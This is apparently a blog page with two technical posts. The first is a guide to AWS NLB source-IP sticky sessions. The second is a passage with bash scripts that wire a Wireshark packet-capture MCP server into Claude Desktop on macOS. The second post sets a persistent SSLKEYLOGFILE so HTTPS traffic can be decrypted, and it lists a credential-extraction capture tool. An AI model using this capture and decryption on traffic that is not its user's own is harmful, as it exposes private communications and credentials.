Deep Dive: AWS NLB Sticky Sessions Setup, Behavior, and Hidden Pitfalls

When you deploy applications behind a Network Load Balancer (NLB) in AWS, you usually expect perfect traffic distribution — fast, fair, and stateless.
But what if your backend holds stateful sessions — like in-memory login sessions, caching, or WebSocket connections — and you need a given client to keep hitting the same target every time?

That’s where NLB sticky sessions (also called connection stickiness or source IP affinity) come in. They’re powerful but also misunderstood — and misconfiguring them can lead to uneven load, dropped connections, or mysterious client “resets.”

Let’s break down exactly how they work, how to set them up, what to watch for, and how to troubleshoot the tricky edge cases that appear in production.


1. What Are Sticky Sessions on an NLB?

At a high level, sticky sessions ensure that traffic from the same client consistently lands on the same target (EC2 instance, IP, or container) behind your NLB.

Unlike the Application Load Balancer (ALB) — which uses HTTP cookies for stickiness — the NLB operates at Layer 4 (TCP/UDP).
That means it doesn’t look inside your packets. Instead, it bases stickiness on network-level parameters like:

  • Source IP address
  • Destination IP and port
  • Source port (sometimes included in the hash)
  • Protocol (TCP, UDP, or TLS passthrough)

AWS refers to this as “source IP affinity.”
When enabled, the NLB creates a flow-hash mapping that ties the client to a backend target.
As long as the hash remains the same, the same client gets routed to the same target — even across multiple connections.


2. Enabling Sticky Sessions on an AWS NLB

Stickiness is configured per target group, not at the NLB level.

Step-by-Step via AWS Console

  1. Go to EC2 → Load Balancers → Target Groups
    Find the target group your NLB listener uses.
  2. Select the Target Group → Attributes tab
  3. Under Attributes, set:
    • Stickiness.enabled = true
    • Stickiness.type = source_ip
  4. Save changes and confirm the attributes are updated.

Step-by-Step via AWS CLI

```bash
aws elbv2 modify-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123 \
  --attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip
```

How to Verify:

```bash
aws elbv2 describe-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/mytg/abc123
```

Sample Output:

```json
{
    "Attributes": [
        { "Key": "stickiness.enabled", "Value": "true" },
        { "Key": "stickiness.type", "Value": "source_ip" }
    ]
}
```

3. How NLB Stickiness Actually Works (Under the Hood)

The NLB’s flow hashing algorithm calculates a hash from several parameters — often the “five-tuple”:

<protocol, source IP, source port, destination IP, destination port>

The hash is used to choose a target. When stickiness is enabled, NLB remembers this mapping for some time (typically a few minutes to hours, depending on flow expiration).

Key Behavior Points:

  • If the same client connects again using the same IP and port, the hash matches → same backend target.
  • If any part of that tuple changes (e.g. client source port changes), the hash may change → client might hit a different target.
  • NLBs maintain this mapping in memory; if the NLB node restarts or fails over, the mapping is lost.
  • Sticky mappings can also be lost when cross-zone load balancing or target health status changes.
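To build intuition for the flow hash described above, here is a tiny illustrative sketch in bash: hash the five-tuple and map it onto a fixed list of targets. This is not AWS's actual algorithm, and the instance IDs are made up; it only shows why changing any tuple element can move a client to a different target.

```bash
#!/bin/bash
# Illustration only: NOT the NLB's real algorithm, just the five-tuple-hash idea.
proto="tcp"; src_ip="203.0.113.10"; src_port="54321"; dst_ip="10.0.1.5"; dst_port="443"
targets=("i-0aaa" "i-0bbb" "i-0ccc")   # hypothetical registered targets

# Hash the tuple and map it onto one of the targets
hash=$(printf '%s' "$proto|$src_ip|$src_port|$dst_ip|$dst_port" | cksum | awk '{print $1}')
index=$(( hash % ${#targets[@]} ))
echo "Flow maps to target: ${targets[$index]}"
# Change src_port (or src_ip) and re-run: the index, and therefore the target, can change.
```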

Not Cookie-Based

Because NLBs don’t inspect HTTP traffic, there’s no cookie involved.
This means:

  • You can’t set session duration or expiry time like in ALB stickiness.
  • Stickiness only works as long as the same network path and source IP persist.

4. Known Limitations & Edge Cases

Sticky sessions on NLBs are helpful but brittle. Here’s what can go wrong:

| Issue | Cause | Effect |
|---|---|---|
| Client source IP changes | NAT, VPN, mobile switching networks | Hash changes → new target |
| Different source port | Client opens multiple sockets or reconnects | Each connection may map differently |
| TLS termination at NLB | NLB terminates TLS | Stickiness not supported (only for TCP listeners) |
| Unhealthy target | Health check fails | Mapping breaks; NLB reroutes |
| Cross-zone load balancing toggled | Distribution rules change | May break existing sticky mappings |
| DNS round-robin at client | NLB has multiple IPs per AZ | Client DNS resolver may change NLB node |
| UDP behavior | Stateless packets; different flow hash | Stickiness unreliable for UDP |
| Scaling up/down | New targets added | Hash table rebalanced; some clients remapped |
🧠 Tip: If you rely on stickiness, keep your clients stable (same IP) and avoid frequent target registration changes.

5. Troubleshooting Sticky Session Problems

When things go wrong, these are the most common patterns you’ll see:

1. “Stickiness not working”

  • Check the target group attributes: run aws elbv2 describe-target-group-attributes --target-group-arn <arn> and ensure stickiness.enabled is true.
  • Make sure your listener protocol is TCP, not TLS.
  • Confirm that client IPs aren’t being rewritten by NAT or proxy.
  • Check CloudWatch metrics → if one target gets all the traffic, stickiness might be too “sticky” due to limited source IP variety (see the CloudWatch sketch below).
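For example, a hedged sketch of comparing per-AZ traffic with CloudWatch to spot a skew. The namespace and metric are standard NLB ones, but the load balancer name/ID, zones and time window are placeholders you would swap for your own:

```bash
# Compare ProcessedBytes per Availability Zone (names, IDs and times are placeholders)
for az in eu-west-1a eu-west-1b; do
  echo "AZ: $az"
  aws cloudwatch get-metric-statistics \
    --namespace AWS/NetworkELB \
    --metric-name ProcessedBytes \
    --dimensions Name=LoadBalancer,Value=net/my-nlb/1234567890abcdef Name=AvailabilityZone,Value=$az \
    --start-time 2024-01-01T10:00:00Z \
    --end-time 2024-01-01T11:00:00Z \
    --period 300 --statistics Sum \
    --query 'Datapoints[].Sum' --output text
done
```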

2. “Some clients lose session state randomly”

  • Verify client network stability — mobile clients or corporate proxies can rotate IPs.
  • Confirm health checks aren’t flapping targets.
  • Review your application session design — if session data lives in memory, consider an external session store (Redis, DynamoDB, etc.).

3. “Load imbalance — one instance overloaded”

  • This can happen when many users share one public IP (common in offices or ISPs).
    All those clients hash to the same backend.
  • Mitigate by:
    • Disabling stickiness if not strictly required.
    • Using ALB with cookie-based stickiness (more granular).
    • Scaling target capacity.

4. “Connections drop after some time”

  • NLB may remove stale flow mappings.
  • Check TCP keepalive settings on clients and targets. Ensure keepalive_time < NLB idle timeout (350 seconds) to prevent connection resets. Linux commands to inspect the current values are below; a tuning example follows this list.
```bash
# Check keepalive time (seconds before sending first keepalive probe)
sysctl net.ipv4.tcp_keepalive_time

# Check keepalive interval (seconds between probes)
sysctl net.ipv4.tcp_keepalive_intvl

# Check keepalive probes (number of probes before giving up)
sysctl net.ipv4.tcp_keepalive_probes

# View all at once
sysctl -a | grep tcp_keepalive
```
  • Verify idle timeout on backend apps (e.g., web servers closing connections too early).
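If the keepalives need tightening, here is a hedged example of setting them below the 350-second idle timeout on Linux; the values are illustrative, not a recommendation:

```bash
# Apply at runtime (illustrative values, kept below the NLB's 350s idle timeout)
sudo sysctl -w net.ipv4.tcp_keepalive_time=300
sudo sysctl -w net.ipv4.tcp_keepalive_intvl=30
sudo sysctl -w net.ipv4.tcp_keepalive_probes=5

# Persist across reboots
echo "net.ipv4.tcp_keepalive_time=300" | sudo tee -a /etc/sysctl.d/99-keepalive.conf
sudo sysctl -p /etc/sysctl.d/99-keepalive.conf
```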

6. Observability & Testing

You can validate sticky behavior with:

  • CloudWatch metrics:
    ActiveFlowCount, NewFlowCount, and per-target request metrics.
  • VPC Flow Logs: confirm that repeated requests from the same client IP go to the same backend ENI.
  • Packet captures: Use tcpdump or ss on your backend instances to see if the same source IP consistently connects.

Quick test with curl:

```bash
for i in {1..100}; do
    echo "=== Request $i at $(date) ===" | tee -a curl_test.log
    curl http://<nlb-dns-name>/ -v 2>&1 | tee -a curl_test.log
    sleep 0.5
done
```

Run it from the same host and check which backend responds (log hostname on each instance).
Then try from another IP or VPN — you’ll likely see a different target.
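If each backend includes its hostname in the response (an assumption about your app), you can tally which target answered from a single client, for example:

```bash
# Assumes the app at / returns the backend's hostname in the response body
for i in {1..50}; do
  curl -s http://<nlb-dns-name>/
  echo
done | sort | uniq -c | sort -rn
# With stickiness working from one client IP, a single hostname should dominate.
```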

7. Best Practices

  1. Only enable stickiness if necessary.
    Stateless applications scale better without it.
  2. If using TLS: terminate TLS at the backend or use ALB if you need session affinity.
  3. Use shared session stores.
    Tools like ElastiCache (Redis) or DynamoDB make scaling simpler and safer.
  4. Avoid toggling cross-zone load balancing during traffic — it resets the sticky map.
  5. Set up proper health checks — unhealthy targets break affinity immediately.
  6. Monitor uneven load — large NAT’d user groups can overload a single instance.
  7. For UDP — consider designing idempotent stateless processing; sticky sessions may not behave reliably.

8. Example Architecture Pattern

Scenario: A multiplayer game server behind an NLB.
Each player connects via TCP to the game backend that stores their in-memory state.

✅ Recommended setup:

  • Enable stickiness.enabled = true and stickiness.type = source_ip
  • Disable TLS termination at NLB
  • Keep targets in the same AZ with cross-zone load balancing disabled to maintain stable mapping
  • Maintain external health and scaling logic to avoid frequent re-registrations

This setup ensures that the same player IP always lands on the same backend server, as long as their network path is stable.
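A hedged sketch of wiring that up with the AWS CLI; the ARNs are placeholders:

```bash
# Enable source-IP stickiness on the game target group (placeholder ARN)
aws elbv2 modify-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/game-tg/abc123 \
  --attributes Key=stickiness.enabled,Value=true Key=stickiness.type,Value=source_ip

# Keep cross-zone load balancing disabled on the NLB itself (placeholder ARN)
aws elbv2 modify-load-balancer-attributes \
  --load-balancer-arn arn:aws:elasticloadbalancing:region:acct:loadbalancer/net/game-nlb/def456 \
  --attributes Key=load_balancing.cross_zone.enabled,Value=false
```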

9. Summary Table

| Attribute | Supported Value | Notes |
|---|---|---|
| stickiness.enabled | true / false | Enables sticky sessions |
| stickiness.type | source_ip | Only option for NLB |
| Supported Protocols | TCP, UDP (limited) | Not supported for TLS listeners |
| Persistence Duration | Until flow reset | Not configurable |
| Cookie-based Stickiness | ❌ No | Use ALB for cookie-based |
| Best for | Stateful TCP apps | e.g. games, custom protocols |

10. When to Use ALB Instead

If you’re dealing with HTTP/HTTPS applications that manage user sessions via cookies or tokens, you’ll be much happier using an Application Load Balancer.
It offers:

  • Configurable cookie duration
  • Per-application stickiness
  • Layer-7 routing and metrics

The NLB should be reserved for high-performance, low-latency, or non-HTTP workloads that need raw TCP/UDP handling.
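For comparison, a hedged example of turning on cookie-based stickiness for an ALB target group; the ARN is a placeholder and the 24-hour duration is just an example:

```bash
# ALB target group: load-balancer-generated cookie stickiness with a 24h duration
aws elbv2 modify-target-group-attributes \
  --target-group-arn arn:aws:elasticloadbalancing:region:acct:targetgroup/web-tg/xyz789 \
  --attributes Key=stickiness.enabled,Value=true \
               Key=stickiness.type,Value=lb_cookie \
               Key=stickiness.lb_cookie.duration_seconds,Value=86400
```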

11. Closing Thoughts

AWS NLB sticky sessions are a great feature — but they’re not magic glue.
They work well when your network topology and client IPs are predictable, and your app genuinely needs flow affinity.
However, if your environment involves NATs, mobile networks, or frequent scale-ups, expect surprises.

When in doubt:
→ Keep your app stateless,
→ Let the load balancer do its job, and
→ Use stickiness only as a last resort for legacy or session-bound systems.


Macbook: Set up a Wireshark packet capture MCP for Anthropic Claude Desktop

If you’re like me, the idea of doing anything twice will make you break out in a cold shiver. For my Claude Desktop, I often need a network pcap (packet capture) to unpack something that I am doing. So the script below checks the prerequisites (Wireshark/tshark, Node.js, WireMCP), sets up SSL decryption, and then configures Claude Desktop to use the WireMCP server. Then I got it to work with Zscaler (note, I just did a process grep – you could also check utun/port 9000/9400).

I also added example scripts to test that it’s working, and some prompts to help you test it in Claude.

cat > ~/setup_wiremcp_simple.sh << 'EOF'
#!/bin/bash

# Simplified WireMCP Setup with Zscaler Support

echo ""
echo "============================================"
echo "   WireMCP Setup with Zscaler Support"
echo "============================================"
echo ""

# Detect Zscaler
echo "[INFO] Detecting Zscaler..."
ZSCALER_DETECTED=false
ZSCALER_INTERFACE=""

# Check for Zscaler process
if pgrep -f "Zscaler" >/dev/null 2>&1; then
    ZSCALER_DETECTED=true
    echo "[ZSCALER] ✓ Zscaler process is running"
fi

# Find Zscaler tunnel interface
UTUN_INTERFACES=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_INTERFACES; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_INTERFACE="$iface"
        ZSCALER_DETECTED=true
        echo "[ZSCALER] ✓ Zscaler tunnel found: $iface (IP: $IP)"
        break
    fi
done

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[ZSCALER] ✓ Zscaler environment confirmed"
else
    echo "[INFO] No Zscaler detected - standard network"
fi

echo ""

# Check existing installations
echo "[INFO] Checking installed software..."

if command -v tshark >/dev/null 2>&1; then
    echo "[✓] Wireshark/tshark is installed"
else
    echo "[!] Wireshark not found - install with: brew install --cask wireshark"
fi

if command -v node >/dev/null 2>&1; then
    echo "[✓] Node.js is installed: $(node --version)"
else
    echo "[!] Node.js not found - install with: brew install node"
fi

if [[ -d "$HOME/WireMCP" ]]; then
    echo "[✓] WireMCP is installed at ~/WireMCP"
else
    echo "[!] WireMCP not found"
fi

echo ""

# Configure SSL decryption for Zscaler
if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "[INFO] Configuring SSL/TLS decryption..."
    
    SSL_KEYLOG="$HOME/.wireshark-sslkeys.log"
    touch "$SSL_KEYLOG"
    chmod 600 "$SSL_KEYLOG"
    
    if ! grep -q "SSLKEYLOGFILE" ~/.zshrc 2>/dev/null; then
        echo "" >> ~/.zshrc
        echo "# Wireshark SSL/TLS decryption for Zscaler" >> ~/.zshrc
        echo "export SSLKEYLOGFILE=\"$SSL_KEYLOG\"" >> ~/.zshrc
        echo "[✓] Added SSLKEYLOGFILE to ~/.zshrc"
    else
        echo "[✓] SSLKEYLOGFILE already in ~/.zshrc"
    fi
    
    echo "[✓] SSL key log file: $SSL_KEYLOG"
fi

echo ""

# Update WireMCP for Zscaler
if [[ -d "$HOME/WireMCP" ]]; then
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[INFO] Creating Zscaler-aware wrapper..."
        
        cat > "$HOME/WireMCP/start_zscaler.sh" << 'WRAPPER'
#!/bin/bash
echo "=== WireMCP (Zscaler Mode) ==="

# Set SSL decryption
export SSLKEYLOGFILE="$HOME/.wireshark-sslkeys.log"

# Find Zscaler interface
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        export CAPTURE_INTERFACE="$iface"
        echo "✓ Zscaler tunnel: $iface ($IP)"
        echo "✓ All proxied traffic flows through this interface"
        break
    fi
done

if [[ -z "$CAPTURE_INTERFACE" ]]; then
    export CAPTURE_INTERFACE="en0"
    echo "! Using default interface: en0"
fi

echo ""
echo "Configuration:"
echo "  SSL Key Log: $SSLKEYLOGFILE"
echo "  Capture Interface: $CAPTURE_INTERFACE"
echo ""
echo "To capture: sudo tshark -i $CAPTURE_INTERFACE -c 10"
echo "===============================\n"

cd "$(dirname "$0")"
node index.js
WRAPPER
        
        chmod +x "$HOME/WireMCP/start_zscaler.sh"
        echo "[✓] Created ~/WireMCP/start_zscaler.sh"
    fi
    
    # Create test script
    cat > "$HOME/WireMCP/test_zscaler.sh" << 'TEST'
#!/bin/bash

echo "=== Zscaler & WireMCP Test ==="
echo ""

# Check Zscaler process
if pgrep -f "Zscaler" >/dev/null; then
    echo "✓ Zscaler is running"
else
    echo "✗ Zscaler not running"
fi

# Find tunnel
UTUN_LIST=$(ifconfig -l | grep -o 'utun[0-9]*')
for iface in $UTUN_LIST; do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        echo "✓ Zscaler tunnel: $iface ($IP)"
        FOUND=true
        break
    fi
done

[[ "$FOUND" != "true" ]] && echo "✗ No Zscaler tunnel found"

echo ""

# Check SSL keylog
if [[ -f "$HOME/.wireshark-sslkeys.log" ]]; then
    SIZE=$(wc -c < "$HOME/.wireshark-sslkeys.log")
    echo "✓ SSL key log exists ($SIZE bytes)"
else
    echo "✗ SSL key log not found"
fi

echo ""
echo "Network interfaces:"
tshark -D 2>/dev/null | head -5

echo ""
echo "To capture Zscaler traffic:"
echo "  sudo tshark -i ${iface:-en0} -c 10"
TEST
    
    chmod +x "$HOME/WireMCP/test_zscaler.sh"
    echo "[✓] Created ~/WireMCP/test_zscaler.sh"
fi

echo ""

# Configure Claude Desktop
CLAUDE_CONFIG="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
if [[ -d "$(dirname "$CLAUDE_CONFIG")" ]]; then
    echo "[INFO] Configuring Claude Desktop..."
    
    # Backup existing
    if [[ -f "$CLAUDE_CONFIG" ]]; then
        BACKUP_FILE="${CLAUDE_CONFIG}.backup.$(date +%Y%m%d_%H%M%S)"
        cp "$CLAUDE_CONFIG" "$BACKUP_FILE"
        echo "[✓] Backup created: $BACKUP_FILE"
    fi
    
    # Check if jq is installed
    if ! command -v jq >/dev/null 2>&1; then
        echo "[INFO] Installing jq for JSON manipulation..."
        brew install jq
    fi
    
    # Create temp capture directory
    TEMP_CAPTURE_DIR="$HOME/.wiremcp/captures"
    mkdir -p "$TEMP_CAPTURE_DIR"
    echo "[✓] Capture directory: $TEMP_CAPTURE_DIR"
    
    # Prepare environment variables
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        ENV_JSON=$(jq -n \
            --arg ssllog "$HOME/.wireshark-sslkeys.log" \
            --arg iface "${ZSCALER_INTERFACE:-en0}" \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"SSLKEYLOGFILE": $ssllog, "CAPTURE_INTERFACE": $iface, "ZSCALER_MODE": "true", "CAPTURE_DIR": $capdir}')
    else
        ENV_JSON=$(jq -n \
            --arg capdir "$TEMP_CAPTURE_DIR" \
            '{"CAPTURE_DIR": $capdir}')
    fi
    
    # Add or update wiremcp in config, preserving existing servers
    if [[ -f "$CLAUDE_CONFIG" ]] && [[ -s "$CLAUDE_CONFIG" ]]; then
        echo "[INFO] Merging WireMCP into existing config..."
        jq --arg home "$HOME" \
           --argjson env "$ENV_JSON" \
           '.mcpServers.wiremcp = {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}' \
           "$CLAUDE_CONFIG" > "${CLAUDE_CONFIG}.tmp" && mv "${CLAUDE_CONFIG}.tmp" "$CLAUDE_CONFIG"
    else
        echo "[INFO] Creating new Claude config..."
        jq -n --arg home "$HOME" \
              --argjson env "$ENV_JSON" \
              '{"mcpServers": {"wiremcp": {"command": "node", "args": [$home + "/WireMCP/index.js"], "env": $env}}}' \
              > "$CLAUDE_CONFIG"
    fi
    
    if [[ "$ZSCALER_DETECTED" == "true" ]]; then
        echo "[✓] Claude configured with Zscaler mode"
    else
        echo "[✓] Claude configured"
    fi
    echo "[✓] Existing MCP servers preserved"
fi

echo ""
echo "============================================"
echo "             Summary"
echo "============================================"
echo ""

if [[ "$ZSCALER_DETECTED" == "true" ]]; then
    echo "Zscaler Environment:"
    echo "  ✓ Detected and configured"
    [[ -n "$ZSCALER_INTERFACE" ]] && echo "  ✓ Tunnel interface: $ZSCALER_INTERFACE"
    echo "  ✓ SSL decryption ready"
    echo ""
    echo "Next steps:"
    echo "  1. Restart terminal: source ~/.zshrc"
    echo "  2. Restart browsers for HTTPS decryption"
else
    echo "Standard Network:"
    echo "  • No Zscaler detected"
    echo "  • Standard configuration applied"
fi

echo ""
echo "For Claude Desktop:"
echo "  1. Restart Claude Desktop app"
echo "  2. Ask Claude to analyze network traffic"
echo ""
echo "============================================"

exit 0
EOF
chmod +x ~/setup_wiremcp_simple.sh
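Then run the setup script:

~/setup_wiremcp_simple.sh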

To test if the script worked:

cat > ~/test_wiremcp_claude.sh << 'SCRIPT_EOF'  # outer delimiter differs from the inner 'EOF' heredocs below so they don't close it early
#!/bin/bash

# WireMCP Claude Desktop Interactive Test Script

echo "╔════════════════════════════════════════════════════════╗"
echo "║     WireMCP + Claude Desktop Testing Tool             ║"
echo "╚════════════════════════════════════════════════════════╝"
echo ""

# Colors
GREEN='\033[0;32m'
BLUE='\033[0;34m'
YELLOW='\033[1;33m'
NC='\033[0m'

# Check prerequisites
echo -e "${BLUE}[1/4]${NC} Checking prerequisites..."

if ! command -v tshark >/dev/null 2>&1; then
    echo "   ✗ tshark not found"
    exit 1
fi

if [[ ! -d "$HOME/WireMCP" ]]; then
    echo "   ✗ WireMCP not found at ~/WireMCP"
    exit 1
fi

if [[ ! -f "$HOME/Library/Application Support/Claude/claude_desktop_config.json" ]]; then
    echo "   ⚠ Claude Desktop config not found"
fi

echo -e "   ${GREEN}✓${NC} All prerequisites met"
echo ""

# Detect Zscaler
echo -e "${BLUE}[2/4]${NC} Detecting network configuration..."

ZSCALER_IF=""
for iface in $(ifconfig -l | grep -o 'utun[0-9]*'); do
    IP=$(ifconfig "$iface" 2>/dev/null | grep "inet " | awk '{print $2}')
    if [[ "$IP" == 100.64.* ]]; then
        ZSCALER_IF="$iface"
        echo -e "   ${GREEN}✓${NC} Zscaler tunnel: $iface ($IP)"
        break
    fi
done

if [[ -z "$ZSCALER_IF" ]]; then
    echo "   ⚠ No Zscaler tunnel detected (will use en0)"
    ZSCALER_IF="en0"
fi

echo ""

# Generate test traffic
echo -e "${BLUE}[3/4]${NC} Generating test network traffic..."

# Background network requests
(curl -s https://api.github.com/zen > /dev/null 2>&1) &
(curl -s https://httpbin.org/get > /dev/null 2>&1) &
(curl -s https://www.google.com > /dev/null 2>&1) &
(ping -c 3 8.8.8.8 > /dev/null 2>&1) &

sleep 2
echo -e "   ${GREEN}✓${NC} Test traffic generated (GitHub, httpbin, Google, DNS)"
echo ""

# Show test prompts
echo -e "${BLUE}[4/4]${NC} Test prompts for Claude Desktop"
echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}📋 Copy these prompts into Claude Desktop:${NC}"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 1: Basic Connection Test"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Can you see the WireMCP tools? List all available network analysis capabilities you have access to.
EOF
echo ""
echo "Expected: Claude should list 7 tools (capture_packets, get_summary_stats, etc.)"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 2: Simple Packet Capture"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 20 network packets and show me a summary including:
- Source and destination IPs
- Protocols used
- Port numbers
- Any interesting patterns
EOF
echo ""
echo "Expected: Packets from $ZSCALER_IF with IPs in 100.64.x.x range"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 3: Protocol Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 50 packets and show me:
1. Protocol breakdown (TCP, UDP, DNS, HTTP, TLS)
2. Which protocol is most common
3. Protocol hierarchy statistics
EOF
echo ""
echo "Expected: Protocol percentages and hierarchy tree"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 4: Connection Analysis"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture 100 packets and show me network conversations:
- Top 5 source/destination pairs
- Number of packets per conversation
- Bytes transferred
EOF
echo ""
echo "Expected: Conversation statistics with packet/byte counts"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 5: Threat Detection"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
cat << 'EOF'
Capture traffic for 30 seconds and check all destination IPs against threat databases. Tell me if any malicious IPs are detected.
EOF
echo ""
echo "Expected: List of IPs and threat check results (should show 'No threats')"
echo ""

echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "TEST 6: HTTPS Decryption (Advanced)"
echo "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "⚠️  First: Restart your browser after running this:"
echo "    source ~/.zshrc && echo $SSLKEYLOGFILE"
echo ""
cat << 'EOF'
Capture 30 packets while I browse some HTTPS websites. Can you see any HTTP hostnames or request URIs from the HTTPS traffic?
EOF
echo ""
echo "Expected: If SSL keys are logged, Claude sees decrypted HTTP data"
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${YELLOW}🔧 Manual Verification Commands:${NC}"
echo ""
echo "  # Test manual capture:"
echo "  sudo tshark -i $ZSCALER_IF -c 10"
echo ""
echo "  # Check SSL keylog:"
echo "  ls -lh ~/.wireshark-sslkeys.log"
echo ""
echo "  # Test WireMCP server:"
echo "  cd ~/WireMCP && timeout 3 node index.js"
echo ""
echo "  # Check Claude config:"
echo "  cat \"$HOME/Library/Application Support/Claude/claude_desktop_config.json\""
echo ""

echo "════════════════════════════════════════════════════════"
echo ""

echo -e "${GREEN}✅ Test setup complete!${NC}"
echo ""
echo "Next steps:"
echo "  1. Open Claude Desktop"
echo "  2. Copy/paste the test prompts above"
echo "  3. Verify Claude can access WireMCP tools"
echo "  4. Check ~/WIREMCP_TESTING_EXAMPLES.md for more examples"
echo ""

# Keep generating traffic in background
echo "Keeping test traffic active for 2 minutes..."
echo "(You can Ctrl+C to stop)"
echo ""

# Generate continuous light traffic
for i in {1..24}; do
    (curl -s https://httpbin.org/delay/1 > /dev/null 2>&1) &
    sleep 5
done

echo ""
echo "Traffic generation complete!"
echo ""

SCRIPT_EOF

chmod +x ~/test_wiremcp_claude.sh
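Run it to generate some test traffic and print the prompts:

~/test_wiremcp_claude.sh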

Now that you have tested everything is fine… the below just gives you a few example tests to carry out.

# Try WireMCP Right Now! 🚀

## 🎯 3-Minute Quick Start

### Step 1: Restart Claude Desktop (30 seconds)
```bash
# Kill and restart Claude
killall Claude
sleep 2
open -a Claude
```

### Step 2: Create a script to Generate Some Traffic (30 seconds)

cat > ~/network_activity_loop.sh << 'EOF'
#!/bin/bash

# Script to generate network activity for 30 seconds
# Useful for testing network capture tools

echo "Starting network activity generation for 30 seconds..."
echo "Press Ctrl+C to stop early if needed"

# Record start time
start_time=$(date +%s)
end_time=$((start_time + 30))

# Counter for requests
request_count=0

# Loop for 30 seconds
while [ $(date +%s) -lt $end_time ]; do
    # Create network activity to capture
    echo -n "Request set #$((++request_count)) at $(date +%T): "
    
    # GitHub API call
    curl -s https://api.github.com/users/octocat > /dev/null 2>&1 &
    
    # HTTPBin JSON endpoint
    curl -s https://httpbin.org/json > /dev/null 2>&1 &
    
    # IP address check
    curl -s https://ifconfig.me > /dev/null 2>&1 &
    
    # Wait for background jobs to complete
    wait
    echo "completed"
    
    # Small delay to avoid overwhelming the servers
    sleep 0.5
done

echo ""
echo "Network activity generation completed!"
echo "Total request sets sent: $request_count"
echo "Duration: 30 seconds"
EOF

chmod +x ~/network_activity_loop.sh

# Call the script
~/network_activity_loop.sh

Time to play!

Now open Claude Desktop and we can run a few tests…

  1. Ask Claude:

Can you see the WireMCP tools? List all available network analysis capabilities.

Claude should list 7 tools:
– capture_packets
– get_summary_stats
– get_conversations
– check_threats
– check_ip_threats
– analyze_pcap
– extract_credentials

2. Ask Claude:

Capture 20 network packets and tell me:
– What IPs am I talking to?
– What protocols are being used?
– Anything interesting?

3. In terminal run:

```bash
curl -v https://api.github.com/users/octocat
```

Ask Claude:

I just called api.github.com. Can you capture my network traffic
for 10 seconds and tell me:
1. What IP did GitHub resolve to?
2. How long did the connection take?
3. Were there any errors?

4. Ask Claude:

Monitor my network for 30 seconds and show me:
– Top 5 destinations by packet count
– What services/companies am I connecting to?
– Any unexpected connections?

5. Developer Debugging Examples – Debug Slow API. Ask Claude:

I’m calling myapi.company.com and it feels slow.
Capture traffic for 30 seconds while I make a request and tell me:
– Where is the latency coming from?
– DNS, TCP handshake, TLS, or server response?
– Any retransmissions?

6. Developer Debugging Examples – Debug Connection Timeout. Ask Claude:

I’m getting timeouts to db.example.com:5432.
Capture for 30 seconds and tell me:
1. Is DNS resolving?
2. Are SYN packets being sent?
3. Do I get SYN-ACK back?
4. Any firewall blocking?

7. TLS Handshake failures (often happen with zero trust networks and cert pinning). Ask Claude:

Monitor my network for 2 mins and look for abnormal TLS handshakes, in particular shortlived TLS handshakes, which can occur due to cert pinning issues.

8. Check for Threats. Ask Claude:

Monitor my network for 60 seconds and check all destination
IPs against threat databases. Tell me if anything suspicious.

9. Monitor Background Apps. Ask Claude:

Capture traffic for 30 seconds while I’m idle.
What apps are calling home without me knowing? Only get conversation statistics to show the key connections and the amount of traffic through each. Show any failed traffic or unusual traffic patterns

10. VPN Testing. Ask Claude:

Capture packets for 60 seconds, during which time i will enable my VPN. Compare the difference and see if you can see exactly when my VPN was enabled.

11. Audit traffic. Ask Claude:

Monitor for 5 minutes and tell me:
– Which service used most bandwidth?
– Any large file transfers?
– Unexpected data usage?

12. Looking for specific protocols. Ask Claude:

Monitor my traffic for 30 seconds and see if you can spot any traffic using QUIC and give me statistics on it.

(then go open a youtube website)

13. DNS Queries. Ask Claude:

